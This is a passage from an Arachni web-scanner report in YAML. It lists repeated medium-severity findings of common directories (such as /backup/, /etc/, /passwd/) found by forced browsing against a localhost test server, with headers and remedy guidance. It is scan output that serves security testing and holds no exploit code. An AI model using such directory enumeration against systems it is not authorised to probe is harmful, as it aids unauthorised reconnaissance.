    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/excel/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: excel
    injected: excel
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: excel
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/excel/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/forum/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: forum
    injected: forum
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: forum
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/forum/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/etc/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: etc
    injected: etc
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: etc
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/etc/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/help/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: help
    injected: help
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: help
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/help/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/prv/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: prv
    injected: prv
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: prv
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/prv/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/source/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: source
    injected: source
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: source
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/source/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/backup/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: backup
    injected: backup
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: backup
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/backup/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/bak/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: bak
    injected: bak
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: bak
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/bak/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/old/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: old
    injected: old
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: old
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/old/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/include/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: include
    injected: include
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: include
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/include/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/inc/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: inc
    injected: inc
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: inc
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/inc/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/info/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: info
    injected: info
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: info
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/info/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/dat/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: dat
    injected: dat
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: dat
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/dat/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/data/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: data
    injected: data
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: data
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/data/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/test/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: test
    injected: test
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: test
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/test/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/tmp/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "3"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: tmp
    injected: tmp
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: tmp
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/tmp/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/save/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: save
    injected: save
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: save
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/save/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/archive/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: archive
    injected: archive
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: archive
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/archive/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/marketing/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "9"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: marketing
    injected: marketing
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: marketing
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/marketing/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/pass/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
    elem: path
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "4"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: pass
    injected: pass
    internal_modname: CommonDirectories
    method: ""
    mod_name: CommonDirectories
    name: A common directory exists on the server.
    opts: 
      :regexp: ""
    references: 
      CWE: http://cwe.mitre.org/data/definitions/538.html
      OWASP: https://www.owasp.org/index.php/Forced_browsing
    remedy_guidance: Do not expose file and directory information to the user.
    response: pass
    severity: Medium
    tags: 
    - path
    - directory
    - common
    - discovery
    url: http://localhost:7470/pass/
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cwe: "538"
  cwe_url: http://cwe.mitre.org/data/definitions/538.html
  description: Tries to find common directories on the server.
  elem: path
  internal_modname: CommonDirectories
  method: ""
  mod_name: CommonDirectories
  name: A common directory exists on the server.
  references: 
    CWE: http://cwe.mitre.org/data/definitions/538.html
    OWASP: https://www.owasp.org/index.php/Forced_browsing
  remedy_guidance: Do not expose file and directory information to the user.
  severity: Medium
  tags: 
  - path
  - directory
  - common
  - discovery
  url: http://localhost:7470/passwd/
  variations: 
  - !ruby/object:Arachni::Issue 
    cwe: "538"
    cwe_url: http://cwe.mitre.org/data/definitions/538.html
    description: Tries to find common directories on the server.
